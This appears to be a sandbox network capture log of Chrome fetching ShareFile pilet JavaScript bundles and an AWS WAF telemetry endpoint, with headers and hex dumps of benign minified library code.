                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC15108INData Raw: 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3f 53 79 6d 62 6f 6c 3a 7b 7d 2c 75 3d 63 2e 69 74 65 72 61 74 6f 72 7c 7c 22 40 40 69 74 65 72 61 74 6f 72 22 2c 6c 3d 63 2e 61 73 79 6e 63 49 74 65 72 61 74 6f 72 7c 7c 22 40 40 61 73 79 6e 63 49 74 65 72 61 74 6f 72 22 2c 66 3d 63 2e 74 6f 53 74 72 69 6e 67 54 61 67 7c 7c 22 40 40 74 6f 53 74 72 69 6e 67 54 61 67 22 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 2c 65 5b 74 5d 7d 74 72 79 7b 70 28 7b 7d 2c 22 22 29 7d 63 61 74 63 68 28
                                                                                                                                                                                                                      Data Ascii: ion"==typeof Symbol?Symbol:{},u=c.iterator||"@@iterator",l=c.asyncIterator||"@@asyncIterator",f=c.toStringTag||"@@toStringTag";function p(e,t,n){return Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}),e[t]}try{p({},"")}catch(
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC139INData Raw: 79 28 65 29 2c 6e 3d 30 3b 6e 3c 65 3b 6e 2b 2b 29 74 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 6f 72 77 61 72 64 28 74 2c 22 77 61 72 6e 22 2c 22 57 41 52 4e 49 4e 47 20 44 45 50 52 45 43 41 54 45 44 3a 20 22 2c 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 66 6f 72 77 61 72 64 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                      Data Ascii: y(e),n=0;n<e;n++)t[n]=arguments[n];return this.forward(t,"warn","WARNING DEPRECATED: ",!0)}},{key:"forward",value:function(e,t,n,r){return
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 72 26 26 21 74 68 69 73 2e 64 65 62 75 67 3f 6e 75 6c 6c 3a 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 5b 30 5d 26 26 28 65 5b 30 5d 3d 22 22 2e 63 6f 6e 63 61 74 28 6e 29 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 70 72 65 66 69 78 2c 22 20 22 29 2e 63 6f 6e 63 61 74 28 65 5b 30 5d 29 29 2c 74 68 69 73 2e 6c 6f 67 67 65 72 5b 74 5d 28 65 29 29 7d 7d 2c 7b 6b 65 79 3a 22 63 72 65 61 74 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 28 74 68 69 73 2e 6c 6f 67 67 65 72 2c 76 28 76 28 7b 7d 2c 7b 70 72 65 66 69 78 3a 22 22 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 70 72 65 66 69 78 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 74 2c 22 3a 22 29 7d 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 29 7d 7d 2c 7b
                                                                                                                                                                                                                      Data Ascii: r&&!this.debug?null:("string"==typeof e[0]&&(e[0]="".concat(n).concat(this.prefix," ").concat(e[0])),this.logger[t](e))}},{key:"create",value:function(t){return new e(this.logger,v(v({},{prefix:"".concat(this.prefix,":").concat(t,":")}),this.options))}},{
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 7d 7d 66 6f 72 28 3b 69 3d 63 2e 70 6f 70 28 29 3b 29 61 2e 69 73 56 61 6c 69 64 4c 6f 6f 6b 75 70 28 74 29 7c 7c 28 72 3d 69 2c 74 3d 61 2e 67 65 74 52 65 73 6f 75 72 63 65 28 6e 2c 65 2c 69 2c 73 29 29 7d 7d 29 29 29 7d 29 29 7d 7d 29 29 2c 7b 72 65 73 3a 74 2c 75 73 65 64 4b 65 79 3a 6e 2c 65 78 61 63 74 55 73 65 64 4b 65 79 3a 72 2c 75 73 65 64 4c 6e 67 3a 6f 2c 75 73 65 64 4e 53 3a 69 7d 7d 7d 2c 7b 6b 65 79 3a 22 69 73 56 61 6c 69 64 4c 6f 6f 6b 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 28 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 4e 75 6c 6c 26 26 6e 75 6c 6c 3d 3d 3d 65 7c 7c 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 45 6d 70 74 79
                                                                                                                                                                                                                      Data Ascii: }}for(;i=c.pop();)a.isValidLookup(t)||(r=i,t=a.getResource(n,e,i,s))}})))}))}})),{res:t,usedKey:n,exactUsedKey:r,usedLng:o,usedNS:i}}},{key:"isValidLookup",value:function(e){return!(void 0===e||!this.options.returnNull&&null===e||!this.options.returnEmpty
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 6e 2e 66 6f 72 6d 61 74 28 65 29 7d 7d 29 29 7d 2c 74 68 69 73 2e 69 6e 69 74 28 74 29 7d 72 65 74 75 72 6e 28 30 2c 69 2e 41 29 28 65 2c 5b 7b 6b 65 79 3a 22 69 6e 69 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 3a 7b 7d 7d 29 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 3b 74 68 69 73 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 3d 74 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 3f 74 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 3a 74 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 7c 7c 22 2c 22 7d 7d 2c
                                                                                                                                                                                                                      Data Ascii: n.format(e)}}))},this.init(t)}return(0,i.A)(e,[{key:"init",value:function(e){var t=(arguments.length>1&&void 0!==arguments[1]?arguments[1]:{interpolation:{}}).interpolation;this.formatSeparator=t.formatSeparator?t.formatSeparator:t.formatSeparator||","}},
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC9396INData Raw: 3d 3d 74 79 70 65 6f 66 20 65 3f 69 2e 6c 6e 67 3d 65 3a 69 2e 6c 6e 67 73 3d 65 2c 69 2e 6e 73 3d 74 2c 69 2e 6b 65 79 50 72 65 66 69 78 3d 6e 2c 69 7d 7d 2c 7b 6b 65 79 3a 22 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 74 72 61 6e 73 6c 61 74 6f 72 26 26 28 65 3d 74 68 69 73 2e 74 72 61 6e 73 6c 61 74 6f 72 29 2e 74 72 61 6e 73 6c 61 74 65 2e 61 70 70 6c 79 28 65 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 7b 6b 65 79 3a 22 65 78 69 73 74 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 74 72 61 6e 73 6c 61 74 6f 72 26 26 28 65 3d 74 68 69 73 2e 74 72 61 6e 73 6c 61 74 6f 72 29 2e 65 78 69 73 74 73 2e 61 70 70 6c 79 28 65
                                                                                                                                                                                                                      Data Ascii: ==typeof e?i.lng=e:i.lngs=e,i.ns=t,i.keyPrefix=n,i}},{key:"t",value:function(){var e;return this.translator&&(e=this.translator).translate.apply(e,arguments)}},{key:"exists",value:function(){var e;return this.translator&&(e=this.translator).exists.apply(e
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC1401INData Raw: 2e 46 72 61 67 6d 65 6e 74 2c 6e 75 6c 6c 2c 28 30 2c 62 2e 74 29 28 6e 29 29 7d 29 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 78 28 6f 29 7b 6f 2e 72 65 67 69 73 74 65 72 45 78 74 65 6e 73 69 6f 6e 28 73 2e 63 6c 69 65 6e 74 54 61 73 6b 4c 69 73 74 42 6c 6f 63 6b 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 70 61 72 61 6d 73 3b 72 65 74 75 72 6e 20 74 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 75 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 70 69 6c 65 74 41 70 69 3a 6f 7d 2c 6e 29 29 7d 29 29 2c 6f 2e 72 65 67 69 73 74 65 72 45 78 74 65 6e 73 69 6f 6e 28 73 2e 74 61 73 6b 4c 69 73 74 42 6c 6f 63 6b 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 70 61 72 61 6d 73 3b 72 65 74 75 72 6e 20 74 2e
                                                                                                                                                                                                                      Data Ascii: .Fragment,null,(0,b.t)(n))}))};function x(o){o.registerExtension(s.clientTaskListBlock,(function(e){var n=e.params;return t.default.createElement(u,Object.assign({piletApi:o},n))})),o.registerExtension(s.taskListBlock,(function(e){var n=e.params;return t.


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      107192.168.2.174982513.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC609OUTGET /sharefile-web/sharefiledev-storage-plugin-pilet/1.2.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 131500
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 10:53:15 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:20 GMT
                                                                                                                                                                                                                      ETag: "275af639a62e1f77ea95fd60b6ea5296"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 3649c20f8adf8628b43dbef00864e392.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: WDBw9H_umocysSJdyE3dkzbQoXWvlRciz7njXdZwgBPQnzf5waigng==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC15794INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 73 74 6f 72 61 67 65 70 6c 75 67 69 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevstoragepluginpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},u={};return Object.define
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 74 79 70 65 6f 66 20 77 7c 7c 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 21 3d 3d 62 29 29 7b 69 66 28 21 74 2e 72 65 74 75 72 6e 4f 62 6a 65 63 74 73 26 26 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 4f 62 6a 65 63 74 73 29 7b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 7c 7c 74 68 69 73 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 22 61 63 63 65 73 73 69 6e 67 20 61 6e 20 6f 62 6a 65 63 74 20 2d 20 62 75 74 20 72 65 74 75 72 6e 4f 62 6a 65 63 74 73 20 6f 70 74 69 6f 6e 73 20 69 73 20 6e 6f 74 20 65 6e 61 62 6c 65 64 21 22 29 3b 76 61 72 20 53 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 3f 74 68 69 73 2e 6f 70 74 69 6f 6e
                                                                                                                                                                                                                      Data Ascii: typeof w||"[object Array]"!==b)){if(!t.returnObjects&&!this.options.returnObjects){this.options.returnedObjectHandler||this.logger.warn("accessing an object - but returnObjects options is not enabled!");var S=this.options.returnedObjectHandler?this.option
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 61 72 61 74 6f 72 3a 74 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 7c 7c 22 2c 22 2c 74 68 69 73 2e 75 6e 65 73 63 61 70 65 50 72 65 66 69 78 3d 74 2e 75 6e 65 73 63 61 70 65 53 75 66 66 69 78 3f 22 22 3a 74 2e 75 6e 65 73 63 61 70 65 50 72 65 66 69 78 7c 7c 22 2d 22 2c 74 68 69 73 2e 75 6e 65 73 63 61 70 65 53 75 66 66 69 78 3d 74 68 69 73 2e 75 6e 65 73 63 61 70 65 50 72 65 66 69 78 3f 22 22 3a 74 2e 75 6e 65 73 63 61 70 65 53 75 66 66 69 78 7c 7c 22 22 2c 74 68 69 73 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 3d 74 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 3f 43 28 74 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 29 3a 74 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 45 73 63 61 70 65 64 7c 7c 43 28 22 24 74 28 22 29 2c 74 68 69 73 2e 6e 65 73 74 69 6e 67
                                                                                                                                                                                                                      Data Ascii: arator:t.formatSeparator||",",this.unescapePrefix=t.unescapeSuffix?"":t.unescapePrefix||"-",this.unescapeSuffix=this.unescapePrefix?"":t.unescapeSuffix||"",this.nestingPrefix=t.nestingPrefix?C(t.nestingPrefix):t.nestingPrefixEscaped||C("$t("),this.nesting
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 74 69 62 69 6c 69 74 79 4a 53 4f 4e 2c 73 69 6d 70 6c 69 66 79 50 6c 75 72 61 6c 53 75 66 66 69 78 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 69 6d 70 6c 69 66 79 50 6c 75 72 61 6c 53 75 66 66 69 78 7d 29 2c 21 61 7c 7c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 21 3d 3d 72 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 7c 7c 28 75 2e 66 6f 72 6d 61 74 74 65 72 3d 6f 28 61 29 2c 75 2e 66 6f 72 6d 61 74 74 65 72 2e 69 6e 69 74 28 75 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 3d 75
                                                                                                                                                                                                                      Data Ascii: tibilityJSON,simplifyPluralSuffix:this.options.simplifyPluralSuffix}),!a||this.options.interpolation.format&&this.options.interpolation.format!==r.interpolation.format||(u.formatter=o(a),u.formatter.init(u,this.options),this.options.interpolation.format=u
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 28 7b 7d 2c 65 2e 70 72 6f 70 73 2c 7b 5f 5f 70 6f 73 69 74 69 6f 6e 3a 74 7d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 65 28 65 2c 74 29 7b 69 66 28 21 65 2e 24 24 74 79 70 65 6f 66 7c 7c 21 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 63 6c 6f 6e 65 28 29 20 72 65 71 75 69 72 65 73 20 61 6e 20 65 6c 65 6d 65 6e 74 20 61 6e 64 20 6b 65 79 22 29 3b 76 61 72 20 6e 3d 65 2e 70 72 6f 70 73 2c 72 3d 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 62 65 5b 22 64 65 66 61 75 6c 74 22 5d 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 72 2c 53 65 28 7b 7d
                                                                                                                                                                                                                      Data Ascii: defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}({},e.props,{__position:t})))}function Ne(e,t){if(!e.$$typeof||!t)throw new Error("clone() requires an element and key");var n=e.props,r=e.type;return be["default"].createElement(r,Se({}
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 75 72 6e 20 72 28 69 2e 66 69 6e 61 6c 6c 79 4c 6f 63 29 7d 7d 7d 7d 2c 61 62 72 75 70 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 2e 6c 65 6e 67 74 68 2d 31 3b 6e 3e 3d 30 3b 2d 2d 6e 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 5b 6e 5d 3b 69 66 28 72 2e 74 72 79 4c 6f 63 3c 3d 74 68 69 73 2e 70 72 65 76 26 26 61 2e 63 61 6c 6c 28 72 2c 22 66 69 6e 61 6c 6c 79 4c 6f 63 22 29 26 26 74 68 69 73 2e 70 72 65 76 3c 72 2e 66 69 6e 61 6c 6c 79 4c 6f 63 29 7b 76 61 72 20 6f 3d 72 3b 62 72 65 61 6b 7d 7d 6f 26 26 28 22 62 72 65 61 6b 22 3d 3d 3d 65 7c 7c 22 63 6f 6e 74 69 6e 75 65 22 3d 3d 3d 65 29 26 26 6f 2e 74 72 79 4c 6f 63 3c 3d 74 26 26 74 3c 3d 6f 2e 66
                                                                                                                                                                                                                      Data Ascii: urn r(i.finallyLoc)}}}},abrupt:function(e,t){for(var n=this.tryEntries.length-1;n>=0;--n){var r=this.tryEntries[n];if(r.tryLoc<=this.prev&&a.call(r,"finallyLoc")&&this.prev<r.finallyLoc){var o=r;break}}o&&("break"===e||"continue"===e)&&o.tryLoc<=t&&t<=o.f
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 64 6c 65 72 73 5b 65 5d 3d 6e 75 6c 6c 29 7d 63 6c 65 61 72 28 29 7b 74 68 69 73 2e 68 61 6e 64 6c 65 72 73 26 26 28 74 68 69 73 2e 68 61 6e 64 6c 65 72 73 3d 5b 5d 29 7d 66 6f 72 45 61 63 68 28 65 29 7b 24 2e 66 6f 72 45 61 63 68 28 74 68 69 73 2e 68 61 6e 64 6c 65 72 73 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 75 6c 6c 21 3d 3d 74 26 26 65 28 74 29 7d 29 29 7d 7d 2c 64 65 3d 7b 73 69 6c 65 6e 74 4a 53 4f 4e 50 61 72 73 69 6e 67 3a 21 30 2c 66 6f 72 63 65 64 4a 53 4f 4e 50 61 72 73 69 6e 67 3a 21 30 2c 63 6c 61 72 69 66 79 54 69 6d 65 6f 75 74 45 72 72 6f 72 3a 21 31 7d 2c 70 65 3d 7b 69 73 42 72 6f 77 73 65 72 3a 21 30 2c 63 6c 61 73 73 65 73 3a 7b 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f
                                                                                                                                                                                                                      Data Ascii: dlers[e]=null)}clear(){this.handlers&&(this.handlers=[])}forEach(e){$.forEach(this.handlers,(function(t){null!==t&&e(t)}))}},de={silentJSONParsing:!0,forcedJSONParsing:!0,clarifyTimeoutError:!1},pe={isBrowser:!0,classes:{URLSearchParams:"undefined"!=typeo
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 63 72 69 62 65 28 29 7d 29 29 2c 70 3d 21 30 7d 3b 6c 65 74 20 76 3b 74 72 79 7b 69 66 28 75 26 26 74 74 26 26 22 67 65 74 22 21 3d 3d 6e 26 26 22 68 65 61 64 22 21 3d 3d 6e 26 26 30 21 3d 3d 28 76 3d 61 77 61 69 74 20 69 74 28 6c 2c 72 29 29 29 7b 6c 65 74 20 65 2c 6e 3d 6e 65 77 20 52 65 71 75 65 73 74 28 74 2c 7b 6d 65 74 68 6f 64 3a 22 50 4f 53 54 22 2c 62 6f 64 79 3a 72 2c 64 75 70 6c 65 78 3a 22 68 61 6c 66 22 7d 29 3b 69 66 28 24 2e 69 73 46 6f 72 6d 44 61 74 61 28 72 29 26 26 28 65 3d 6e 2e 68 65 61 64 65 72 73 2e 67 65 74 28 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 29 29 26 26 6c 2e 73 65 74 43 6f 6e 74 65 6e 74 54 79 70 65 28 65 29 2c 6e 2e 62 6f 64 79 29 7b 63 6f 6e 73 74 5b 65 2c 74 5d 3d 55 65 28 76 2c 49 65 28 42 65 28 75 29 29 29 3b 72 3d
                                                                                                                                                                                                                      Data Ascii: cribe()})),p=!0};let v;try{if(u&&tt&&"get"!==n&&"head"!==n&&0!==(v=await it(l,r))){let e,n=new Request(t,{method:"POST",body:r,duplex:"half"});if($.isFormData(r)&&(e=n.headers.get("content-type"))&&l.setContentType(e),n.body){const[e,t]=Ue(v,Ie(Be(u)));r=
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC1018INData Raw: 6e 20 4f 28 74 29 7b 74 2e 72 65 67 69 73 74 65 72 45 78 74 65 6e 73 69 6f 6e 28 77 2e 59 43 2e 50 72 6f 6a 65 63 74 54 61 62 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 6e 2e 70 61 72 61 6d 73 3b 72 65 74 75 72 6e 20 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 70 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 70 69 6c 65 74 41 70 69 3a 74 7d 2c 72 29 29 7d 29 29 2c 74 2e 72 65 67 69 73 74 65 72 45 78 74 65 6e 73 69 6f 6e 28 77 2e 59 43 2e 52 65 63 65 6e 74 6c 79 44 65 6c 65 74 65 64 54 61 62 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 6e 2e 70 61 72 61 6d 73 3b 72 65 74 75 72 6e 20 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 79 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 70 69 6c 65 74 41 70 69 3a 74 7d 2c 72
                                                                                                                                                                                                                      Data Ascii: n O(t){t.registerExtension(w.YC.ProjectTab,(function(n){var r=n.params;return e.createElement(p,Object.assign({piletApi:t},r))})),t.registerExtension(w.YC.RecentlyDeletedTab,(function(n){var r=n.params;return e.createElement(y,Object.assign({piletApi:t},r


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      108192.168.2.174982818.245.175.1004437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC407OUTGET /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1
                                                                                                                                                                                                                      Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC448INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:19 GMT
                                                                                                                                                                                                                      allow: POST
                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                      expires: 0
                                                                                                                                                                                                                      x-amzn-waf-challenge-id: Root=1-672a73b3-0aa2948a72c88670467abd26
                                                                                                                                                                                                                      X-Cache: Error from cloudfront
                                                                                                                                                                                                                      Via: 1.1 af0820cc0fe26435f38ffebff8f8e4b4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: CDG55-P1
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      X-Amz-Cf-Id: QWAj6fng9faJD1FZ5qEkUWOHtBCDpqAG4vquszm5xyPSs4LmJdPMvQ==


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      109192.168.2.174982913.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC611OUTGET /sharefile-web/sharefiledev-review-approval-pilet/0.27.6/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
